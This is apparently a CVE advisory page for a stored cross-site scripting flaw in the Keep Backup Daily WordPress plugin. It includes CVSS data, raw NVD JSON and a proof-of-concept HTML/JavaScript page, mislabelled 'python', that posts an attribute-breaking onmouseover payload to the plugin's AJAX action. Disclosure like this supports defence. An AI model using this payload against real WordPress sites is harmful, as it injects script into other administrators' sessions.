Security Vulnerability Report
中文
CVE-2026-3577 CVSS 4.4 MEDIUM

CVE-2026-3577

Published: 2026-03-21 00:16:29
Last Modified: 2026-04-22 21:32:08
Source: [email protected]

Description

The Keep Backup Daily plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the backup title alias (`val` parameter) in the `update_kbd_bkup_alias` AJAX action in all versions up to, and including, 2.1.2. This is due to insufficient input sanitization and output escaping. While `sanitize_text_field()` strips HTML tags on save, it does not encode double quotes. The backup titles are output in HTML attribute contexts without `esc_attr()`. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts via attribute injection that will execute whenever another administrator views the backup list page.

CVSS Details

CVSS Score
4.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Keep Backup Daily <= 2.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-3577 Stored XSS --> <!-- Preconditions: Attacker must have Administrator privileges --> <html> <body> <script> function exploit() { // Payload to inject XSS via HTML attribute context // Using double quote to break out of the attribute value var xss_payload = '" onmouseover="alert(\'CVE-2026-3577_PoC\')" '; // Target endpoint for the vulnerable AJAX action var target_url = '/wp-admin/admin-ajax.php'; // Parameters required for the request var params = 'action=update_kbd_bkup_alias&val=' + encodeURIComponent(xss_payload); var xhr = new XMLHttpRequest(); xhr.open('POST', target_url, true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.onreadystatechange = function() { if (xhr.readyState === 4 && xhr.status === 200) { console.log('Payload injected successfully. Check the backup list page.'); } }; xhr.send(params); } // Execute the exploit exploit(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3577", "sourceIdentifier": "[email protected]", "published": "2026-03-21T00:16:28.917", "lastModified": "2026-04-22T21:32:08.360", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Keep Backup Daily plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the backup title alias (`val` parameter) in the `update_kbd_bkup_alias` AJAX action in all versions up to, and including, 2.1.2. This is due to insufficient input sanitization and output escaping. While `sanitize_text_field()` strips HTML tags on save, it does not encode double quotes. The backup titles are output in HTML attribute contexts without `esc_attr()`. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts via attribute injection that will execute whenever another administrator views the backup list page."}, {"lang": "es", "value": "El plugin Keep Backup Daily para WordPress es vulnerable a Cross-Site Scripting Almacenado a través del alias del título de la copia de seguridad (parámetro 'val') en la acción AJAX 'update_kbd_bkup_alias' en todas las versiones hasta la 2.1.2, inclusive. Esto se debe a una sanitización de entrada y un escape de salida insuficientes. Aunque 'sanitize_text_field()' elimina las etiquetas HTML al guardar, no codifica las comillas dobles. Los títulos de las copias de seguridad se muestran en contextos de atributos HTML sin 'esc_attr()'. Esto hace posible que atacantes autenticados, con acceso de nivel de Administrador y superior, inyecten scripts web arbitrarios a través de la inyección de atributos que se ejecutarán cada vez que otro administrador vea la página de la lista de copias de seguridad."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/keep-backup-daily/tags/2.1.1/inc/functions.php#L626", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/keep-backup-daily/tags/2.1.1/inc/kbd_cron.php#L505", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/keep-backup-daily/trunk/inc/functions.php#L626", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/keep-backup-daily/trunk/inc/kbd_cron.php#L505", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3481587%40keep-backup-daily&new=3481587%40keep-backup-daily&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/18a4fa4b-5c99-4347-8b34-e49f7e0972be?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.